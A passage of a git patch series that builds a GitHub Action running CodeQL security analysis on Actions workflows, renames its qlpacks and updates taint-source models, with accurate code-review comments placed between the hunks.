"sha512-bFJl0I1KVc9jYTe9tdGGpAMPy32dLBXXo1dS/YwSCTL/2nd9XeHsY616RE3HPXDVk+a+dBuzyz5YdlXwcDTr2A==", + "requires": { + "@octokit/endpoint": "^6.0.1", + "@octokit/request-error": "^2.1.0", + "@octokit/types": "^6.16.1", + "is-plain-object": "^5.0.0", + "node-fetch": "^2.6.7", + "universal-user-agent": "^6.0.0" + } + }, + "@octokit/request-error": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-2.1.0.tgz", + "integrity": 
"sha512-1VIvgXxs9WHSjicsRwq8PlR2LR2x6DwsJAaFgzdi0JfJoGSO8mYI/cHJQ+9FbN21aa+DrgNLnwObmyeSC8Rmpg==", + "requires": { + "@octokit/types": "^6.0.3", + "deprecation": "^2.0.0", + "once": "^1.4.0" + } + }, + "@octokit/types": { + "version": "6.41.0", + "resolved": "https://registry.npmjs.org/@octokit/types/-/types-6.41.0.tgz", + "integrity": "sha512-eJ2jbzjdijiL3B4PrSQaSjuF2sPEQPVCPzBvTHJD9Nz+9dw2SGH4K4xeQJ77YfTq5bRQ+bD8wT11JbeDPmxmGg==", + "requires": { + "@octokit/openapi-types": "^12.11.0" + } + }, + "@types/node": { + "version": "20.11.19", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.11.19.tgz", + "integrity": "sha512-7xMnVEcZFu0DikYjWOlRq7NTPETrm7teqUT2WkQjrTIkEgUyyGdWsj/Zg8bEJt5TNklzbPD1X3fqfsHw3SpapQ==", + "dev": true, + "requires": { + "undici-types": "~5.26.4" + } + }, + "@vercel/ncc": { + "version": "0.38.1", + "resolved": "https://registry.npmjs.org/@vercel/ncc/-/ncc-0.38.1.tgz", + "integrity": "sha512-IBBb+iI2NLu4VQn3Vwldyi2QwaXt5+hTyh58ggAMoCGE6DJmPvwL3KPBWcJl1m9LYPChBLE980Jw+CS4Wokqxw==", + "dev": true + }, + "before-after-hook": { + "version": "2.2.3", + "resolved": "https://registry.npmjs.org/before-after-hook/-/before-after-hook-2.2.3.tgz", + "integrity": "sha512-NzUnlZexiaH/46WDhANlyR2bXRopNg4F/zuSA3OpZnllCUgRaOF2znDioDWrmbNVsuZk6l9pMquQB38cfBZwkQ==" + }, + "deprecation": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/deprecation/-/deprecation-2.3.1.tgz", + "integrity": "sha512-xmHIy4F3scKVwMsQ4WnVaS8bHOx0DmVwRywosKhaILI0ywMDWPtBSku2HNxRvF7jtwDRsoEwYQSfbxj8b7RlJQ==" + }, + "is-plain-object": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-5.0.0.tgz", + "integrity": "sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==" + }, + "node-fetch": { + "version": "2.7.0", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.7.0.tgz", + "integrity": 
"sha512-c4FRfUm/dbcWZ7U+1Wq0AwCyFL+3nt2bEw05wfxSz+DWpWsitgmSgYmy2dQdWyKC1694ELPqMs/YzUSNozLt8A==", + "requires": { + "whatwg-url": "^5.0.0" + } + }, + "once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "requires": { + "wrappy": "1" + } + }, + "prettier": { + "version": "3.2.5", + "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.2.5.tgz", + "integrity": "sha512-3/GWa9aOC0YeD7LUfvOG2NiDyhOWRvt1k+rcKhOuYnMY24iiCphgneUfJDyFXd6rZCAnuLBv6UeAULtrhT/F4A==", + "dev": true + }, + "semver": { + "version": "6.3.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", + "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==" + }, + "tr46": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", + "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" + }, + "tunnel": { + "version": "0.0.6", + "resolved": "https://registry.npmjs.org/tunnel/-/tunnel-0.0.6.tgz", + "integrity": "sha512-1h/Lnq9yajKY2PEbBadPXj3VxsDDu844OnaAo52UVmIzIvwwtBPIuNvkjuzBlTWpfJyUbG3ez0KSBibQkj4ojg==" + }, + "typescript": { + "version": "5.3.3", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.3.3.tgz", + "integrity": "sha512-pXWcraxM0uxAS+tN0AG/BF2TyqmHO014Z070UsJ+pFvYuRSq8KH8DmWpnbXe0pEPDHXZV3FcAbJkijJ5oNEnWw==", + "dev": true + }, + "undici": { + "version": "5.28.3", + "resolved": "https://registry.npmjs.org/undici/-/undici-5.28.3.tgz", + "integrity": "sha512-3ItfzbrhDlINjaP0duwnNsKpDQk3acHI3gVJ1z4fmwMK31k5G9OVIAMLSIaP6w4FaGkaAkN6zaQO9LUvZ1t7VA==", + "requires": { + "@fastify/busboy": "^2.0.0" + } + }, + "undici-types": { + "version": "5.26.5", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", + "integrity": 
"sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==", + "dev": true + }, + "universal-user-agent": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/universal-user-agent/-/universal-user-agent-6.0.1.tgz", + "integrity": "sha512-yCzhz6FN2wU1NiiQRogkTQszlQSlpWaw8SvVegAc+bDxbzHgh1vX8uIe8OYyMH6DwH+sdTJsgMl36+mSMdRJIQ==" + }, + "uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==" + }, + "webidl-conversions": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", + "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" + }, + "whatwg-url": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", + "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", + "requires": { + "tr46": "~0.0.3", + "webidl-conversions": "^3.0.0" + } + }, + "wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" + } + } +} diff --git a/.github/action/package.json b/.github/action/package.json new file mode 100644 index 00000000000..90512a3163c --- /dev/null +++ b/.github/action/package.json 
@@ -0,0 +1,48 @@
+{
+ "name": "codeql-actions-action",
+ "version": "0.1.0",
+ "description": "CodeQL Pack to analyze GitHub Actions and Workflows",
+ "main": "dist/index.js",
+ "scripts": {
+ "bundle": "npm run format:write && npm run package",
+ "cli": "ts-node src/index.ts",
+ "ci-test": "jest",
+ "format:write": "prettier --write **/*.ts",
+ "format:check": "prettier --check **/*.ts",
+ "lint": "npx eslint . -c ./.github/linters/.eslintrc.yml",
+ "package": "ncc build src/index.ts --license licenses.txt",
+ "package:watch": "npm run package -- --watch",
+ "test": "(jest && make-coverage-badge --output-path ./badges/coverage.svg) || make-coverage-badge --output-path ./badges/coverage.svg",
+ "all": "npm run format:write && npm run lint && npm run test && npm run package"
+ },
+ "repository": {
+ "type": "git",
+ "url": "git+https://github.com/GitHubSecurityLab/codeql-actions.git"
+ },
+ "exports": {
+ ".": "./dist/index.js"
+ },
+ "keywords": [
+ "codeql",
+ "security",
+ "actions"
+ ],
+ "author": "Pwntester",
+ "license": "MIT",
+ "bugs": {
+ "url": "https://github.com/GitHubSecurityLab/codeql-actions/issues"
+ },
+ "homepage": "https://github.com/GitHubSecurityLab/codeql-actions#readme",
+ "dependencies": {
+ "@actions/core": "^1.10.1",
+ "@actions/exec": "^1.1.1",
+ "@actions/github": "^5.1.1",
+ "@actions/tool-cache": "^2.0.1"
+ },
+ "devDependencies": {
+ "@types/node": "^20.6.0",
+ "@vercel/ncc": "^0.38.0",
+ "prettier": "^3.0.3",
+ "typescript": "^5.2.2"
+ }
+}
diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts
new file mode 100644
index 00000000000..eeeef401a52
--- /dev/null
+++ b/.github/action/src/codeql.ts
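Review bot: Several entries in `scripts` call tools that `devDependencies` does not declare: `ci-test` and `test` run `jest` and `make-coverage-badge`, `cli` runs `ts-node`, and `lint` runs `npx eslint`. None of these packages appear in the lockfile added by the same commit, so they are not pinned or integrity-checked. `npx` would have to resolve `eslint` from the registry at run time, and the other scripts fail after a clean `npm ci`. Add the tools to `devDependencies` so the lockfile records them, or remove the scripts until they are needed.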
@@ -0,0 +1,158 @@ +import * as fs from "fs"; +import * as path from "path"; + +import * as core from "@actions/core"; +import * as toolcache from "@actions/tool-cache"; +import * as github from "@actions/github"; +import * as toolrunner from "@actions/exec/lib/toolrunner"; + +export interface CodeQLConfig { + // The path to the codeql bundle. + path: string; + // The language to use for analysis. + language: string; + // CodeQL pack to use for analysis. + pack: string; + // The codeql suite to use for analysis. + suite: string; + // The source root to use for analysis. + source_root?: string; + // The output file for the SARIF file. + output?: string; +} + +export async function newCodeQL(): Promise { + return { + language: "yaml", + path: await findCodeQL(), + pack: "GitHubSecurityLab/actions-queries", + suite: "codeql-suites/actions-code-scanning.qls", + source_root: core.getInput("source-root"), + output: core.getInput("sarif"), + }; +} + +export async function runCommand( + config: CodeQLConfig, + args: string[], +): Promise { + var bin = path.join(config.path, "codeql"); + let output = ""; + var options = { + listeners: { + stdout: (data: Buffer) => { + output += data.toString(); + }, + }, + }; + + await new toolrunner.ToolRunner(bin, args, options).exec(); + core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); + + return output.trim(); +} + +export async function runCommandJson( + config: CodeQLConfig, + args: string[], +): Promise { + return JSON.parse(await runCommand(config, args)); +} +async function findCodeQL(): Promise { + // check if codeql is in the toolcache + var codeqlPath = await findCodeQlInToolcache(); + if (codeqlPath !== undefined) { + return codeqlPath; + } + // default to the codeql in the path + return "codeql"; +} + +async function findCodeQlInToolcache(): Promise { + const candidates = toolcache + .findAllVersions("CodeQL") + .map((version) => ({ + folder: toolcache.find("CodeQL", version), + version, + })) + .filter(({ 
folder }) => fs.existsSync(path.join(folder, "pinned-version"))); + + if (candidates.length === 1) { + const candidate = candidates[0]; + core.info(`CodeQL tools found in toolcache: '${candidate.folder}'.`); + core.debug(`CodeQL toolcache version: '${candidate.version}'.`); + + return path.join(candidate.folder, "codeql"); + } + + core.warning(`No CodeQL tools found in toolcache.`); + + return undefined; +} + +export async function downloadPack(codeql: CodeQLConfig): Promise { + try { + await runCommand(codeql, ["pack", "download", codeql.pack]); + return true; + } catch (error) { + core.warning("Failed to download pack from GitHub..."); + } + return false; +} + +export async function codeqlDatabaseCreate( + codeql: CodeQLConfig, +): Promise { + // get runner temp directory for database + var temp = process.env["RUNNER_TEMP"]; + if (temp === undefined) { + temp = "/tmp"; + } + var database_path = path.join(temp, "codeql-actions-db"); + var source_root = + codeql.source_root || process.env["GITHUB_WORKSPACE"] || "./"; + + await runCommand(codeql, [ + "database", + "create", + "--language", + codeql.language, + "--source-root", + source_root, + database_path, + ]); + + return database_path; +} + +export async function codeqlDatabaseAnalyze( + codeql: CodeQLConfig, + database_path: string, +): Promise { + var codeql_output = codeql.output || "codeql-actions.sarif"; + + var cmd = [ + "database", + "analyze", + "--format", + "sarif-latest", + "--sarif-add-query-help", + "--output", + codeql_output, + ]; + + // remote pack or local pack + if (codeql.pack.startsWith("GitHubSecurityLab/")) { + var suite = codeql.pack + ":" + codeql.suite; + } else { + // assume path + var suite = path.join(codeql.pack, codeql.suite); + cmd.push("--search-path", codeql.pack); + } + + cmd.push(database_path, suite); + + await runCommand(codeql, cmd); + + return codeql_output; +} 
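Review bot: The fallback in `findCodeQL` returns the bare string `"codeql"`, but `runCommand` always builds `path.join(config.path, "codeql")`, so the fallback becomes the relative path `codeql/codeql` instead of the PATH lookup the comment describes. A relative tool path is resolved against the working directory, which, if that directory is the checked-out repository being analysed, holds content the action does not control. Have `findCodeQL` return `""` for this case and use `var bin = config.path === "" ? "codeql" : path.join(config.path, "codeql");` in `runCommand`, so only a toolcache hit produces a joined path.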
diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts
new file mode 100644
index 00000000000..b1a4fc80c64
--- /dev/null
+++ b/.github/action/src/index.ts
@@ -0,0 +1,61 @@
+import * as path from "path";
+import * as core from "@actions/core";
+import * as cql from "./codeql";
+
+/**
+ * The main function for the action.
+ * @returns {Promise} Resolves when the action is complete.
+ */
+export async function run(): Promise {
+ try {
+ // set up codeql
+ var codeql = await cql.newCodeQL();
+
+ core.debug(`CodeQL CLI found at '${codeql.path}'`);
+
+ await cql.runCommand(codeql, ["version", "--format", "terse"]);
+
+ // check yaml support
+ var languages = await cql.runCommandJson(codeql, [
+ "resolve",
+ "languages",
+ "--format",
+ "json",
+ ]);
+
+ if (!languages.hasOwnProperty("yaml")) {
+ core.setFailed("CodeQL Yaml extractor not installed");
+ throw new Error("CodeQL Yaml extractor not installed");
+ }
+
+ // download pack
+ core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`);
+ var pack_downloaded = await cql.downloadPack(codeql);
+
+ if (pack_downloaded === false) {
+ var action_path = path.resolve(path.join(__dirname, "..", "..", ".."));
+ codeql.pack = path.join(action_path, "ql", "src");
+
+ core.info(`Pack defaulting back to local pack: '${codeql.pack}'`);
+ } else {
+ core.info(`Pack downloaded '${codeql.pack}'`);
+ }
+
+ core.info("Creating CodeQL database...");
+ var database_path = await cql.codeqlDatabaseCreate(codeql);
+
+ core.info("Running CodeQL analysis...");
+ var sarif = await cql.codeqlDatabaseAnalyze(codeql, database_path);
+
+ core.info(`SARIF results: '${sarif}'`);
+ core.setOutput("sarif", sarif);
+
+ core.info("Finished CodeQL analysis");
+ } catch (error) {
+ // Fail the workflow run if an error occurs
+ if (error instanceof Error) core.setFailed(error.message);
+ }
+}
+
+// eslint-disable-next-line @typescript-eslint/no-floating-promises
+run();
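Review bot: The `catch` block in `run` marks the step failed only when the thrown value is an `Error`, so any other rejection leaves the step green although no analysis ran. For a scanning action a silent pass is the worst outcome, because the missing SARIF reads as "no findings". Replace the guard with `core.setFailed(error instanceof Error ? error.message : String(error));`. The fallback to the local pack after a failed download is also logged only at info level and may deserve a `core.warning`.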
diff --git a/.github/action/tsconfig.json b/.github/action/tsconfig.json
new file mode 100644
index 00000000000..c4b7762f9cd
--- /dev/null
+++ b/.github/action/tsconfig.json
@@ -0,0 +1,24 @@
+{
+ "$schema": "https://json.schemastore.org/tsconfig",
+ "compilerOptions": {
+ "target": "ES2022",
+ "module": "NodeNext",
+ "rootDir": "./src",
+ "moduleResolution": "NodeNext",
+ "baseUrl": "./",
+ "sourceMap": true,
+ "outDir": "./dist",
+ "noImplicitAny": true,
+ "esModuleInterop": true,
+ "forceConsistentCasingInFileNames": true,
+ "strict": true,
+ "skipLibCheck": true,
+ "newLine": "lf"
+ },
+ "exclude": [
+ "./dist",
+ "./node_modules",
+ "./__tests__",
+ "./coverage"
+ ]
+}
diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
new file mode 100644
index 00000000000..7380ae46d07
--- /dev/null
+++ b/.github/workflows/build.yml
@@ -0,0 +1,30 @@
+name: Build and Compile Action
+
+on:
+ pull_request:
+ branches: ["master", "develop"]
+ workflow_dispatch:
+
+permissions:
+ contents: read
+ packages: read
+ pull-requests: read
+
+jobs:
+ action:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: dorny/paths-filter@4512585405083f25c027a35db413c2b3b9006d50
+ id: changes
+ with:
+ filters: |
+ src:
+ - '.github/action/**'
+ - 'action.yml'
+
+ - name: Run action
+ if: steps.changes.outputs.src == 'true'
+ uses: ./
+ with:
+ extractor-version: latest
diff --git a/action.yml b/action.yml
new file mode 100644
index 00000000000..03054c195be
--- /dev/null
+++ b/action.yml
@@ -0,0 +1,19 @@
+name: "codeql-actions"
+description: "CodeQL Pack for GitHub Actions and Workflows"
+
+inputs:
+ token:
+ description: GitHub Token
+ default: ${{ github.token }}
+
+ source-root:
+ description: "Path of the root source code directory, relative to $GITHUB_WORKSPACE."
+ default: "./"
+
+ sarif:
+ description: "SARIF File Output"
+ default: "codeql-actions.sarif"
+
+runs:
+ using: "node16"
+ main: ".github/action/dist/index.js"
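Review bot: The `Run action` step passes `extractor-version: latest`, but the `action.yml` added in this same commit declares only `token`, `source-root` and `sarif`, so the value is not consumed and most likely just produces an unexpected-input warning. Either declare and implement the input or drop the `with:` block. Separately, `dorny/paths-filter` is pinned to a commit SHA while `actions/checkout@v4` uses a mutable tag; pin both the same way, e.g. `uses: actions/checkout@<full-commit-sha> # v4`.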
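Review bot: The `token` input defaults to `${{ github.token }}`, yet nothing in `src/index.ts` or `src/codeql.ts` from this commit reads it; only `source-root` and `sarif` go through `core.getInput`. Declaring it still hands the credential to the action's process environment, presumably inherited by the `codeql` child processes, so it is better left out until a code path needs it. `using: "node16"` also disagrees with `@types/node` `^20.6.0` in `package.json`, which lets code type-check against APIs the declared runtime may not provide; `using: "node20"` would match.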
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 8cf5ba69354..dc4daebaac8 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -1,7 +1,7 @@ --- library: true warnOnImplicitThis: true -name: codeql/actions-all +name: GitHubSecurityLab/actions-all version: 0.0.1-dev dependencies: codeql/controlflow: ^0.1.7 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f4c43168664..919a244b390 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,6 +1,6 @@ --- library: false -name: codeql/actions-queries +name: GitHubSecurityLab/actions-queries version: 0.0.1 groups: - actions From cf4ab41df2eeb5131a64ec2faadf4832dbfb7635 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 12:32:48 +0100 Subject: [PATCH 0038/1267] feat(action): rename qlpacks to use githubsecuritylab prefix --- .github/action/dist/index.js | 2 +- .github/action/src/codeql.ts | 2 +- ql/lib/qlpack.yml | 2 +- .../codeql-suites/actions-code-scanning.qls | 19 +++++++++++++++++++ ql/src/qlpack.yml | 2 +- 5 files changed, 23 insertions(+), 4 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index e13da63ecda..23c03588162 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28606,7 +28606,7 @@ async function newCodeQL() { return { language: "yaml", path: await findCodeQL(), - pack: "GitHubSecurityLab/actions-queries", + pack: "githubsecuritylab/actions-queries", suite: "codeql-suites/actions-code-scanning.qls", source_root: core.getInput("source-root"), output: core.getInput("sarif"), diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index eeeef401a52..3826737a082 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts 
@@ -25,7 +25,7 @@ export async function newCodeQL(): Promise { return { language: "yaml", path: await findCodeQL(), - pack: "GitHubSecurityLab/actions-queries", + pack: "githubsecuritylab/actions-queries", suite: "codeql-suites/actions-code-scanning.qls", source_root: core.getInput("source-root"), output: core.getInput("sarif"), diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index dc4daebaac8..1ccfae0b278 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -1,7 +1,7 @@ --- library: true warnOnImplicitThis: true -name: GitHubSecurityLab/actions-all +name: githubsecuritylab/actions-all version: 0.0.1-dev dependencies: codeql/controlflow: ^0.1.7 diff --git a/ql/src/codeql-suites/actions-code-scanning.qls b/ql/src/codeql-suites/actions-code-scanning.qls index e69de29bb2d..7d6c94e0c8c 100644 --- a/ql/src/codeql-suites/actions-code-scanning.qls +++ b/ql/src/codeql-suites/actions-code-scanning.qls @@ -0,0 +1,19 @@ +- description: Standard Code Scanning queries for Actions +- queries: . + +- include: + kind: + - problem + - path-problem + tags contain: + - security + - maintainability + +- include: + kind: + - diagnostic + +- exclude: + tags contain: + - experimental + - testing diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 919a244b390..fb5d29fb957 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,6 +1,6 @@ --- library: false -name: GitHubSecurityLab/actions-queries +name: githubsecuritylab/actions-queries version: 0.0.1 groups: - actions From 5d1264d3a4beef372fa972e068a95b9393429a6d Mon Sep 17 00:00:00 2001 
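Review bot: Lower-casing `pack` to `"githubsecuritylab/actions-queries"` no longer matches the case-sensitive check `codeql.pack.startsWith("GitHubSecurityLab/")` in `codeqlDatabaseAnalyze`. That function lies outside this hunk, and the diffstat shows only this one line of `codeql.ts` changed. A pack that downloaded successfully would then take the `else` branch and be treated as a local directory, passed through `path.join(codeql.pack, codeql.suite)` and `--search-path`, so the analysis looks for the suite on disk instead of in the registry pack. Update the check in the same commit, e.g. `if (codeql.pack.toLowerCase().startsWith("githubsecuritylab/")) {`. The bundled `dist/index.js` needs rebuilding to carry the same fix.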
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 12:56:06 +0100 Subject: [PATCH 0039/1267] feat(action): update references to qlpacks --- .gitignore | 2 ++ ql/lib/ext/PLACEHOLDER.model.yml | 2 +- ql/lib/ext/ahmadnassri_action-changed-files.model.yml | 2 +- ql/lib/ext/dorny_paths-filter.model.yml | 2 +- ql/lib/ext/frabert_replace-string-action.model.yml | 2 +- ql/lib/ext/jitterbit_get-changed-files.model.yml | 4 ++-- ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml | 2 +- ql/lib/ext/tj-actions_changed-files.model.yml | 4 ++-- ql/lib/ext/tj-actions_verify-changed-files.model.yml | 2 +- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 11 files changed, 14 insertions(+), 12 deletions(-) diff --git a/.gitignore b/.gitignore index 1233930f4a4..e147f87bf72 100644 --- a/.gitignore +++ b/.gitignore @@ -1,2 +1,4 @@ .DS_Store **/*.testproj +ql/lib/.codeql/ +ql/src/.codeql/ diff --git a/ql/lib/ext/PLACEHOLDER.model.yml b/ql/lib/ext/PLACEHOLDER.model.yml index ef916067967..2f549573a53 100644 --- a/ql/lib/ext/PLACEHOLDER.model.yml +++ b/ql/lib/ext/PLACEHOLDER.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sinkModel data: - ["","","",""] diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index 3308967eebc..8f449f6b26d 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request", "PR changed files"] diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml index d2b2ed48fc5..6ee41e93826 100644 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ b/ql/lib/ext/dorny_paths-filter.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["dorny/paths-filter", "*", "output.changes", "pull_request", "PR changed files"] diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 79fd5c76e4a..760b7cd46e7 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index bc7344eedca..f19a2da37f5 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["jitterbit/get-changed-files", "*", "output.all", "pull_request", "PR changed files"] @@ -16,4 +16,4 @@ extensions: - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request_target", "PR changed files"] - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"] \ No newline at end of file + - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index 332527813a4..bddfb8e67fa 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml 
+++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint"] diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index b3b8baed7fc..fc5557db6ea 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["tj-actions/changed-files", "*", "output.added_files", "pull_request", "PR changed files"] @@ -36,4 +36,4 @@ extensions: - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request", "PR changed files"] - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"] - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] \ No newline at end of file + - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml index 408abfbb8d0..76d83bd249e 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["tj-actions/verify-changed-files", "*", "output.changed-files", "pull_request", "PR changed files"] diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1ccfae0b278..3c344549245 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.1-dev +version: 0.0.1 dependencies: codeql/controlflow: ^0.1.7 codeql/yaml: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index fb5d29fb957..346079df984 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -9,6 +9,6 @@ suites: codeql-suites extractor: yaml defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: - codeql/actions-all: ${workspace} + githubsecuritylab/actions-all: ${workspace} warnOnImplicitThis: true tests: test From 959a974c8b848176a6c2416f93afb4ab370761d5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 13:32:05 +0100 Subject: [PATCH 0040/1267] feat(action): clone pack (not use the registry) --- .github/action/dist/index.js | 83 +++++++++++++++++++++++++++++++++++- .github/action/src/codeql.ts | 1 - .github/action/src/gh.ts | 54 +++++++++++++++++++++++ .github/action/src/index.ts | 13 +++++- 4 files changed, 148 insertions(+), 3 deletions(-) create mode 100644 .github/action/src/gh.ts diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 23c03588162..9c0a19375f4 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js 
